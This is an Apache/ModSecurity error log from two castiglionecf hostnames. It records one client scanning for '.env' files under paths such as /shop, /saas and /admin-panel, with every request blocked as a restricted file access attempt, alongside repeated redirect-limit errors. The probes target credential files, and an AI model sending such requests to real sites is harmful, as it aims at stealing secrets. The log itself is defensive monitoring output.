[Mon May 11 16:26:26.889896 2026] [security2:error] [pid 1411099:tid 1411113] [client 18.180.54.2:58672] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shop/.env"] [unique_id "agHnEg-Qm4vhlWBPlMi6IQAAAA0"]
[Mon May 11 16:26:26.890435 2026] [core:error] [pid 1411099:tid 1411113] [client 18.180.54.2:58672] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:26.890605 2026] [security2:error] [pid 1411099:tid 1411113] [client 18.180.54.2:58672] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shop/.env"] [unique_id "agHnEg-Qm4vhlWBPlMi6IQAAAA0"]
[Mon May 11 16:26:27.126174 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.180.54.2:58676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/saas/.env"] [unique_id "agHnEw-Qm4vhlWBPlMi6IgAAAAo"]
[Mon May 11 16:26:27.126398 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.180.54.2:58676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/saas/.env"] [unique_id "agHnEw-Qm4vhlWBPlMi6IgAAAAo"]
[Mon May 11 16:26:27.127795 2026] [core:error] [pid 1411099:tid 1411110] [client 18.180.54.2:58676] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:27.127964 2026] [security2:error] [pid 1411099:tid 1411110] [client 18.180.54.2:58676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/saas/.env"] [unique_id "agHnEw-Qm4vhlWBPlMi6IgAAAAo"]
[Mon May 11 16:26:27.577242 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58690] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/store/.env"] [unique_id "agHnE0WKUxpmnkK7zHx8EAAAAQY"]
[Mon May 11 16:26:27.577474 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58690] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/store/.env"] [unique_id "agHnE0WKUxpmnkK7zHx8EAAAAQY"]
[Mon May 11 16:26:27.578007 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58690] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:27.578191 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:58690] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/store/.env"] [unique_id "agHnE0WKUxpmnkK7zHx8EAAAAQY"]
[Mon May 11 16:26:27.853985 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58696] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/client/.env"] [unique_id "agHnE_y_GXSWIKeli0vyZQAAAIM"]
[Mon May 11 16:26:27.854210 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58696] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/client/.env"] [unique_id "agHnE_y_GXSWIKeli0vyZQAAAIM"]
[Mon May 11 16:26:27.854704 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58696] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:27.854856 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:58696] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/client/.env"] [unique_id "agHnE_y_GXSWIKeli0vyZQAAAIM"]
[Mon May 11 16:26:28.267560 2026] [security2:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58702] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/saas/.env"] [unique_id "agHnFDJnyuKVXoStDha01QAAAFQ"]
[Mon May 11 16:26:28.267785 2026] [security2:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/saas/.env"] [unique_id "agHnFDJnyuKVXoStDha01QAAAFQ"]
[Mon May 11 16:26:28.284780 2026] [core:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58702] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:28.288859 2026] [security2:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/saas/.env"] [unique_id "agHnFDJnyuKVXoStDha01QAAAFQ"]
[Mon May 11 16:26:28.557217 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:40656] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/project/.env"] [unique_id "agHnFEWKUxpmnkK7zHx8EgAAARI"]
[Mon May 11 16:26:28.557442 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:40656] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/project/.env"] [unique_id "agHnFEWKUxpmnkK7zHx8EgAAARI"]
[Mon May 11 16:26:28.557909 2026] [core:error] [pid 1411055:tid 1411075] [client 18.180.54.2:40656] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:28.558061 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:40656] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/project/.env"] [unique_id "agHnFEWKUxpmnkK7zHx8EgAAARI"]
[Mon May 11 16:26:29.010112 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:40672] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/client/.env"] [unique_id "agHnFQ-Qm4vhlWBPlMi6JQAAAAI"]
[Mon May 11 16:26:29.010350 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:40672] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/client/.env"] [unique_id "agHnFQ-Qm4vhlWBPlMi6JQAAAAI"]
[Mon May 11 16:26:29.010904 2026] [core:error] [pid 1411099:tid 1411103] [client 18.180.54.2:40672] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:29.011064 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:40672] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/client/.env"] [unique_id "agHnFQ-Qm4vhlWBPlMi6JQAAAAI"]
[Mon May 11 16:26:29.245861 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:40684] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/admin-panel/.env"] [unique_id "agHnFVV4kyjgo4bQBUhUXgAAANc"]
[Mon May 11 16:26:29.246092 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:40684] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/admin-panel/.env"] [unique_id "agHnFVV4kyjgo4bQBUhUXgAAANc"]
[Mon May 11 16:26:29.246600 2026] [core:error] [pid 1416109:tid 1416153] [client 18.180.54.2:40684] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:29.246755 2026] [security2:error] [pid 1416109:tid 1416153] [client 18.180.54.2:40684] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/admin-panel/.env"] [unique_id "agHnFVV4kyjgo4bQBUhUXgAAANc"]
[Mon May 11 16:26:29.755917 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:40694] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/project/.env"] [unique_id "agHnFUWKUxpmnkK7zHx8EwAAAQI"]
[Mon May 11 16:26:29.756141 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:40694] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/project/.env"] [unique_id "agHnFUWKUxpmnkK7zHx8EwAAAQI"]
[Mon May 11 16:26:29.756624 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:40694] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:29.756775 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:40694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/project/.env"] [unique_id "agHnFUWKUxpmnkK7zHx8EwAAAQI"]
[Mon May 11 16:26:29.938524 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:40698] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/control-panel/.env"] [unique_id "agHnFfy_GXSWIKeli0vyaQAAAI0"]
[Mon May 11 16:26:29.938868 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:40698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/control-panel/.env"] [unique_id "agHnFfy_GXSWIKeli0vyaQAAAI0"]
[Mon May 11 16:26:29.939759 2026] [core:error] [pid 1411201:tid 1411259] [client 18.180.54.2:40698] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:29.939977 2026] [security2:error] [pid 1411201:tid 1411259] [client 18.180.54.2:40698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/control-panel/.env"] [unique_id "agHnFfy_GXSWIKeli0vyaQAAAI0"]
[Mon May 11 16:26:30.505426 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40702] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/admin-panel/.env"] [unique_id "agHnFkWKUxpmnkK7zHx8FAAAAQw"]
[Mon May 11 16:26:30.505728 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/admin-panel/.env"] [unique_id "agHnFkWKUxpmnkK7zHx8FAAAAQw"]
[Mon May 11 16:26:30.506218 2026] [core:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40702] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:30.506378 2026] [security2:error] [pid 1411055:tid 1411069] [client 18.180.54.2:40702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/admin-panel/.env"] [unique_id "agHnFkWKUxpmnkK7zHx8FAAAAQw"]
[Mon May 11 16:26:30.670612 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:40710] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/user-panel/.env"] [unique_id "agHnFg-Qm4vhlWBPlMi6KAAAABE"]
[Mon May 11 16:26:30.670866 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:40710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/user-panel/.env"] [unique_id "agHnFg-Qm4vhlWBPlMi6KAAAABE"]
[Mon May 11 16:26:30.671389 2026] [core:error] [pid 1411099:tid 1411117] [client 18.180.54.2:40710] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:30.671571 2026] [security2:error] [pid 1411099:tid 1411117] [client 18.180.54.2:40710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/user-panel/.env"] [unique_id "agHnFg-Qm4vhlWBPlMi6KAAAABE"]
